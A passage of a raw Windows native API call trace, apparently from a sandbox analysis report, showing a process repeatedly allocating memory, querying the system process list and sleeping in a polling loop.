BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.171] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.197] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.220] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.257] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.290] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.313] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 